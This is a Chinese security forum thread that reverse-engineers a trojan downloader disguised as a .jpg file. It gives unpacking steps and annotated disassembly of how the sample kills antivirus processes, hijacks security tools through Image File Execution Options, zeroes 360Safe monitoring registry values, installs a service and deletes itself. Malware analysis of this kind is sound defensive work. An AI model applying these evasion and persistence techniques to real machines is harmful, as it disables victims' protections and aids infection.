一个下载者分析
本帖最后由 qiang 于 2010-7-16 10:47 编辑
文件: C:\WINDOWS\system32\sadfasdf.jpg
大小: 34816 字节
文件版本: 1, 0, 0, 1
修改时间: 2010年7月14日, 14:32:54
MD5: 91846723B592208AEBE7852C5CDCAAA5
SHA1: 460ABC9410C05CC04F152381B14EA9BB81507F6F
采用“UPX”加壳方式,在系统目录C:\WINDOWS\system32伪装成jpg文件格式,
脱壳:往下拉到如下位置
00417D50 83C3 04 add ebx, 4
00417D53 ^ EB E1 jmp short 00417D36
00417D55 FF96 E0730100 call dword ptr
00417D5B 61 popad
00417D5C ^ E9 FBBCFFFF jmp 00413A5C
在00417D5C ^ E9 FBBCFFFF jmp 00413A5C按F2下断点,按F9运行,在按F7来到入口点。被执行后,释放名为“78767551”的文件到%Temp%目录下,遍历查找安全软件进程,找到后尝试将其结束,达到自身保护目的00413A5C > /E8 85FFFFFF call 004139E6
00413A61 . |83F8 0A cmp eax, 0A
00413A64 . |72 74 jb short 00413ADA
00413A66 . |68 10234100 push 00412310 ; /MutexName = "iiopoip" //创建一个名为iiopoip的互斥量
00413A6B . |6A 01 push 1 ; |InitialOwner = TRUE
00413A6D . |6A 00 push 0 ; |pSecurity = NULL
00413A6F . |FF15 80104000 call dword ptr ; \CreateMutexA
00413A75 . |FF15 7C104000 call dword ptr ; ntdll.RtlGetLastWin32Error
00413A7B . |3D B7000000 cmp eax, 0B7
00413A80 . |75 08 jnz short 00413A8A
00413A82 . |6A 00 push 0 ; /ExitCode = 0
00413A84 . |FF15 78104000 call dword ptr ; \ExitProcess
00413A8A > |56 push esi
00413A8B . |BE 283C4100 mov esi, 00413C28
00413A90 . |56 push esi ; /Buffer => sadfasdf.00413C28
00413A91 . |68 04010000 push 104 ; |BufSize = 104 (260.)
00413A96 . |FF15 94104000 call dword ptr ; \GetTempPathA 获取系统临时目录
00413A9C . |68 04234100 push 00412304 ; /StringToAdd = "78767551"
00413AA1 . |56 push esi ; |ConcatString => ""
00413AA2 . |FF15 58104000 call dword ptr ; \lstrcatA //字符串连接得到C:\DOCUME~1\safe\LOCALS~1\Temp\78767551
00413AA8 . |56 push esi
00413AA9 . |E8 B2FDFFFF call 00413860 //这个函数作用释放名为“78767551”的文件到Temp目录下
00413AAE . |59 pop ecx
00413AAF . |5E pop esi
00413AB0 . |84C0 test al, al
00413AB2 . |74 05 je short 00413AB9
00413AB4 . |E8 47FCFFFF call 00413700 关键call 1
00413AB9 > |B8 A03E4100 mov eax, 00413EA0
00413ABE . |6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
00413AC0 . |50 push eax ; |Title => ""
00413AC1 . |50 push eax ; |Text => ""
00413AC2 . |6A FF push -1 ; |hOwner = FFFFFFFF
00413AC4 . |FF15 04114000 call dword ptr ; \MessageBoxA
00413ACA . |68 B80B0000 push 0BB8 ; /Timeout = 3000. ms
00413ACF . |FF15 8C104000 call dword ptr ; \Sleep
00413AD5 . |E8 45FEFFFF call 0041391F
00413ADA > |33C0 xor eax, eax
00413ADC . |C3 retn
关键call 1:
00413700 /$ E8 DBFEFFFF call 004135E0 //call 2:创建进程快照,遍历查找安全软件进程,里面有个字符串解密函数
00413705 |. 84C0 test al, al
00413707 |. 74 10 je short 00413719
00413709 |. E8 72FAFFFF call 00413180
0041370E |. 68 30750000 push 7530 ; /Timeout = 30000. ms
00413713 |. FF15 8C104000 call dword ptr ; \Sleep
00413719 |> E8 92F8FFFF call 00412FB0 //call 3
0041371E |. 33C0 xor eax, eax
00413720 \. C3 retn
进入call 2后:
00413657 |. E8 D4FEFFFF ||call 00413530 //字符串解密函数,第一次解密出来的字符串是"kavstart.exe",后面还有kissvc.exe、kmailmom.exe等
0041365C |. 83C4 04 ||add esp, 4
0041365F |> 8D5424 3C ||lea edx, dword ptr
00413663 |. 56 ||push esi ; /String2
00413664 |. 52 ||push edx ; |String1
00413665 |. FF15 5C104000 ||call dword ptr ; \lstrcmpiA //将解密出的kavstart.exe等名称与系统进程名逐一比较
随后在注册表HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下添加下列项,劫持指定名称的程序(效果是:启动avp.exe或Thunder5.exe时实际被执行的是Debugger值指向的svchost.exe,安全软件无法正常启动):
avp.exe
Thunder5.exe
键值均为:debugger
数据均指向:svchost.exe
00413730 /$ 81EC FC000000 sub esp, 0FC
00413736 |. 8B0D B8224100 mov ecx, dword ptr
0041373C |. 56 push esi
0041373D |. 57 push edi
0041373E |. 894C24 10 mov dword ptr , ecx
00413742 |. B9 12000000 mov ecx, 12
00413747 |. BE 68224100 mov esi, 00412268 ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
0041374C |. 8D7C24 30 lea edi, dword ptr
00413750 |. A1 B4224100 mov eax, dword ptr
00413755 |. F3:A5 rep movs dword ptr es:, dword pt>
00413757 |. 66:A5 movs word ptr es:, word ptr [esi>
00413759 |. 894424 0C mov dword ptr , eax
0041375D |. 33C0 xor eax, eax
0041375F |. 894424 18 mov dword ptr , eax
00413763 |. 33C9 xor ecx, ecx
00413765 |. A4 movs byte ptr es:, byte ptr [esi>
00413766 |. 894424 1C mov dword ptr , eax
0041376A |. 894C24 7B mov dword ptr , ecx
0041376E |. 894424 20 mov dword ptr , eax
00413772 |. 894C24 7F mov dword ptr , ecx
00413776 |. 894424 24 mov dword ptr , eax
0041377A |. 898C24 83000000 mov dword ptr , ecx
00413781 |. 894424 28 mov dword ptr , eax
00413785 |. 66:898C24 87000>mov word ptr , cx
0041378D |. 66:894424 2C mov word ptr , ax
00413792 |. 888C24 89000000 mov byte ptr , cl
00413799 |. 888C24 8C000000 mov byte ptr , cl
004137A0 |. B9 1D000000 mov ecx, 1D
004137A5 |. 8DBC24 8D000000 lea edi, dword ptr
004137AC |. 884424 2E mov byte ptr , al
004137B0 |. 8B15 BC224100 mov edx, dword ptr
004137B6 |. F3:AB rep stos dword ptr es:
004137B8 |. 66:AB stos word ptr es:
004137BA |. 895424 14 mov dword ptr , edx
004137BE |. 8D5424 30 lea edx, dword ptr
004137C2 |. AA stos byte ptr es:
004137C3 |. 8D8424 8C000000 lea eax, dword ptr
004137CA |. 52 push edx ; /String2
004137CB |. 50 push eax ; |String1
004137CC |. FF15 54104000 call dword ptr ; \lstrcpyA
004137D2 |. 8B8C24 08010000 mov ecx, dword ptr
004137D9 |. 8D9424 8C000000 lea edx, dword ptr
004137E0 |. 51 push ecx ; /StringToAdd
004137E1 |. 52 push edx ; |ConcatString
004137E2 |. FF15 58104000 call dword ptr ; \lstrcatA
004137E8 |. 8D4424 08 lea eax, dword ptr
004137EC |. 8D8C24 8C000000 lea ecx, dword ptr
004137F3 |. 50 push eax ; /pHandle
004137F4 |. 51 push ecx ; |Subkey
004137F5 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004137FA |. FF15 0C104000 call dword ptr ; \RegCreateKeyA
00413800 |. 8D5424 0C lea edx, dword ptr
00413804 |. 52 push edx ; /String
00413805 |. FF15 68104000 call dword ptr ; \lstrlenA
0041380B |. 8B4C24 08 mov ecx, dword ptr
0041380F |. 40 inc eax
00413810 |. 50 push eax ; /BufSize
00413811 |. 8D4424 10 lea eax, dword ptr ; |
00413815 |. 50 push eax ; |Buffer
00413816 |. 6A 01 push 1 ; |ValueType = REG_SZ
00413818 |. 6A 00 push 0 ; |Reserved = 0
0041381A |. 68 5C224100 push 0041225C ; |Debugger
0041381F |. 51 push ecx ; |hKey
00413820 |. FF15 10104000 call dword ptr ; \RegSetValueExA
00413826 |. 8B5424 08 mov edx, dword ptr
0041382A |. 52 push edx ; /hKey
0041382B |. FF15 14104000 call dword ptr ; \RegCloseKey
00413831 |. 5F pop edi
00413832 |. 33C0 xor eax, eax
00413834 |. 5E pop esi
00413835 |. 81C4 FC000000 add esp, 0FC
0041383B \. C3 retn
进入call 3:
00412FB0 /$ 81EC 30010000 sub esp, 130
00412FB6 |. 55 push ebp
00412FB7 |. 68 0CBD4000 push 0040BD0C ; ASCII "safeboxTray.exe"
00412FBC |. E8 AFFAFFFF call <字符处理函数>
00412FC1 |. 68 1CBD4000 push 0040BD1C ; ASCII "360tray.exe"
00412FC6 |. E8 A5FAFFFF call <字符处理函数>
00412FCB |. 68 28BD4000 push 0040BD28 ; ASCII "psapi.dll"
00412FD0 |. E8 9BFAFFFF call <字符处理函数>
00412FD5 |. 68 34BD4000 push 0040BD34 ; ASCII " /u"
00412FDA |. E8 91FAFFFF call <字符处理函数>
00412FDF |. 83C4 10 add esp, 10
00412FE2 |. 6A 00 push 0 ; /ProcessID = 0
00412FE4 |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
00412FE6 |. E8 FF0A0000 call 00413AEA ; \CreateToolhelp32Snapshot
00412FEB |. 8BE8 mov ebp, eax
00412FED |. 83FD FF cmp ebp, -1
00412FF0 |. 0F84 71010000 je 00413167
00412FF6 |. 8D4424 0C lea eax, dword ptr
00412FFA |. 56 push esi
00412FFB |. 50 push eax ; /lppe
00412FFC |. 55 push ebp ; |hSnapshot
00412FFD |. C74424 18 28010>mov dword ptr , 128 ; |
00413005 |. E8 DA0A0000 call 00413AE4 ; \Process32First
0041300A |. 85C0 test eax, eax
0041300C |. 0F84 2F010000 je 00413141
00413012 |. 8B35 5C104000 mov esi, dword ptr ; kernel32.lstrcmpiA
00413018 |. 8D4C24 34 lea ecx, dword ptr
0041301C |. 68 0CBD4000 push 0040BD0C ; /String2 = "safeboxTray.exe"
00413021 |. 51 push ecx ; |String1
00413022 |. FFD6 call esi ; \lstrcmpiA
00413024 |. 85C0 test eax, eax
00413026 |. 74 23 je short 0041304B
00413028 |> 8D5424 10 /lea edx, dword ptr
0041302C |. 52 |push edx ; /lppe
0041302D |. 55 |push ebp ; |hSnapshot
0041302E |. E8 AB0A0000 |call 00413ADE ; \Process32Next
00413033 |. 85C0 |test eax, eax
00413035 |. 0F84 06010000 |je 00413141 //没找到就调走到00413141地址
0041303B |. 8D4424 34 |lea eax, dword ptr
0041303F |. 68 0CBD4000 |push 0040BD0C ; ASCII "safeboxTray.exe"
00413044 |. 50 |push eax
00413045 |. FFD6 |call esi
00413047 |. 85C0 |test eax, eax
00413049 |.^ 75 DD \jnz short 00413028 //判断系统中是否存在safeboxTray.exe,没找到继续往上,存在往下执行
0041304B |> \8B4C24 18 mov ecx, dword ptr
0041304F |. 53 push ebx
00413050 |. 51 push ecx ; /ProcessId
00413051 |. 6A 00 push 0 ; |Inheritable = FALSE
00413053 |. 68 10040000 push 410 ; |Access = VM_READ|QUERY_INFORMATION
00413058 |. FF15 34104000 call dword ptr ; \OpenProcess //打开找到的安全软件进程,后面将其结束
00413113 |. E8 78FBFFFF call 00412C90
00413118 |. E8 93F9FFFF call 00412AB0 //这个call进去是修改下列360注册表相关键值
0041311D |. E8 4EFEFFFF call 00412F70 //删除某个文件,具体哪个不太清楚
00413122 |. E8 A9FAFFFF call 00412BD0 修改下列360注册表相关键值,关闭360监控保护自身:
项:
HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon
键值: ExecAccess
指向数据:0
键值: MonAccess
指向数据:0
键值: LeakShowed
指向数据:0
键值: SiteAccess
指向数据:0
键值: UDiskAccess
指向数据:0
键值: weeken
指向数据:0
调用带“DELAY_UNTIL_REBOOT”标志参数的系统API函数“MoveFileEx”来实现下次系统启动后病毒的自删除,生成一个名为“iiopoip”的互斥体,防止自身的再次调用,并创建
下列的“Kisstusb”服务:
项:
HKLM\SYSTEM\CurrentControlSet\Services\Kisstusb
键值:DisplayName
指向数据:Kisstusb
键值:ImagePath
指向数据:%Temp%\78767551
0041391F /$ 55 push ebp
00413920 |. 8BEC mov ebp, esp
00413922 |. 81EC 24010000 sub esp, 124
00413928 |. 56 push esi
00413929 |. 57 push edi
0041392A |. 8D85 DCFEFFFF lea eax,
00413930 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00413935 |. 33F6 xor esi, esi ; |
00413937 |. 50 push eax ; |PathBuffer
00413938 |. 56 push esi ; |hModule => NULL
00413939 |. FF15 70104000 call dword ptr ; \GetModuleFileNameA
0041393F |. 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
00413941 |. 8D85 DCFEFFFF lea eax, ; |
00413947 |. 56 push esi ; |NewName => NULL
00413948 |. 50 push eax ; |ExistingName
00413949 |. FF15 50104000 call dword ptr ; \MoveFileExA //实现下次系统启动后病毒的自删除
0041394F |. E8 2EFBFFFF call 00413482
00413954 |. 68 283C4100 push 00413C28 ; C:\DOCUME~1\safe\LOCALS~1\Temp\78767551
00413959 |. E8 62FFFFFF call 004138C0 //创建“Kisstusb”服务,再调用实现对服务关闭后删除“78767551”文件,并调用API函数
“SHDeleteKeyA”删除注册表中“Kisstusb”服务相关项实现对该服务的清除
0041395E |. 59 pop ecx
0041395F |. 56 push esi ; /hTemplateFile
00413960 |. 56 push esi ; |Attributes
00413961 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00413963 |. 56 push esi ; |pSecurity
00413964 |. 56 push esi ; |ShareMode
00413965 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
0041396A |. 68 F8224100 push 004122F8 ; |\\.\Delkil
0041396F |. FF15 A8104000 call dword ptr ; \CreateFileA
00413975 |. 8BF8 mov edi, eax
00413977 |. 83FF FF cmp edi, -1
0041397A |. 74 1D je short 00413999
0041397C |. 8D45 FC lea eax,
0041397F |. 56 push esi ; /pOverlapped
00413980 |. 50 push eax ; |pBytesReturned
00413981 |. 56 push esi ; |OutBufferSize
00413982 |. 56 push esi ; |OutBuffer
00413983 |. 68 002A0000 push 2A00 ; |InBufferSize = 2A00 (10752.)
00413988 |. 68 30E84000 push 0040E830 ; |InBuffer = sadfasdf.0040E830
0041398D |. 68 1C002200 push 22001C ; |IoControlCode = 22001C
00413992 |. 57 push edi ; |hDevice
00413993 |. FF15 6C104000 call dword ptr ; \DeviceIoControl
00413999 |> 57 push edi ; /hObject
0041399A |. FF15 B4104000 call dword ptr ; \CloseHandle
004139A0 |. 68 60EA0000 push 0EA60 ; /Timeout = 60000. ms
004139A5 |. FF15 8C104000 call dword ptr ; \Sleep
004139AB |. E8 43FAFFFF call 004133F3 //
释放一个随机名称的动态链接库文件到%Temp%目录下,这里是5e41b2.dll,该文件用来实现隐藏运行下载下来的木马,
004139B0 |. 8B3D 00114000 mov edi, dword ptr ; user32.GetMessageA
004139B6 |. 56 push esi
004139B7 |. 56 push esi
004139B8 |. 8D45 E0 lea eax,
004139BB |. 56 push esi
004139BC |. 50 push eax
004139BD |> FFD7 /call edi
004139BF |. 85C0 |test eax, eax
004139C1 |. 74 1D |je short 004139E0
004139C3 |. 8D45 E0 |lea eax,
004139C6 |. 50 |push eax ; /pMsg
004139C7 |. FF15 FC104000 |call dword ptr ; \TranslateMessage
004139CD |. 8D45 E0 |lea eax,
004139D0 |. 50 |push eax ; /pMsg
004139D1 |. FF15 F8104000 |call dword ptr ; \DispatchMessageA
004139D7 |. 56 |push esi
004139D8 |. 56 |push esi
004139D9 |. 8D45 E0 |lea eax,
004139DC |. 56 |push esi
004139DD |. 50 |push eax
004139DE |.^ EB DD \jmp short 004139BD
004139E0 |> 5F pop edi
004139E1 |. 33C0 xor eax, eax
004139E3 |. 5E pop esi
004139E4 |. C9 leave
004139E5 \. C3 retn
时间有限,先把大体流程写到这里,之后再完善,还望大家指教。
解压密码ggsafe。 用代码框编辑下吧,那样会更加美观. 分析的挺精彩的! 学习了。谢谢。 不错,分析的很详细的 支持啊,下来学习一下 冒似5e41b2.dll才是关键所在,为何不一块分析出来! 学习了 做成视频吧 看起来没那么痛苦 LZ知道的太多了。。。 最好麻烦LZ做个视频。。 看起来容易点。。:loveliness: 不错 本帖最后由 qiang 于 2010-7-16 10:59 编辑
回复 7# riusksk
应楼下同志要求5e41b2.dll分析
下面给出分析,5e41b2.dll主要有两个函数
入口点的函数只是一个MessageBoxA调用,作用:木马作者调试时使用,类似于用Dbgview.exe查看调试信息;作者编译时传入了无效的窗口句柄(hOwner = -4),因此对话框不会显示。
10001040 5e41b2.>/$ 6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
10001042 |. 68 04300010 push 10003004 ; |Title = "x"
10001047 |. 68 00300010 push 10003000 ; |Text = "5"
1000104C |. 6A FC push -4 ; |hOwner = FFFFFFFC
1000104E |. FF15 08200010 call dword ptr [<&USER32.MessageBoxA>; \MessageBoxA
10001054 |. B8 01000000 mov eax, 1
10001059 \. C2 0C00 retn 0C
另一个是Winext函数,作用:以命令行方式运行下载回来的木马。(注:下面的反汇编显示WinExec的ShowState参数为5 = SW_SHOW,窗口并非隐藏;“隐藏运行”的具体含义需进一步核实。)
10001000 5e41b2.>/$ 56 push esi
10001001 |. 57 push edi
10001002 |. 8B7C24 0C mov edi, dword ptr
10001006 |. 83C9 FF or ecx, FFFFFFFF
10001009 |. 33C0 xor eax, eax
1000100B |. 6A 05 push 5 ; /ShowState = SW_SHOW
1000100D |. F2:AE repne scas byte ptr es: ; |
1000100F |. F7D1 not ecx ; |
10001011 |. 2BF9 sub edi, ecx ; |
10001013 |. 68 08300010 push 10003008 ; |CmdLine = ""
10001018 |. 8BC1 mov eax, ecx ; |
1000101A |. 8BF7 mov esi, edi ; |
1000101C |. BF 08300010 mov edi, 10003008 ; |
10001021 |. C1E9 02 shr ecx, 2 ; |
10001024 |. F3:A5 rep movs dword ptr es:, dword p>; |
10001026 |. 8BC8 mov ecx, eax ; |
10001028 |. 83E1 03 and ecx, 3 ; |
1000102B |. F3:A4 rep movs byte ptr es:, byte ptr>; |
1000102D |. FF15 00200010 call dword ptr [<&KERNEL32.WinExec>] ; \WinExec
10001033 |. 5F pop edi
10001034 |. B0 01 mov al, 1
10001036 |. 5E pop esi
10001037 \. C3 retn
还请大家多多提意见。
学习下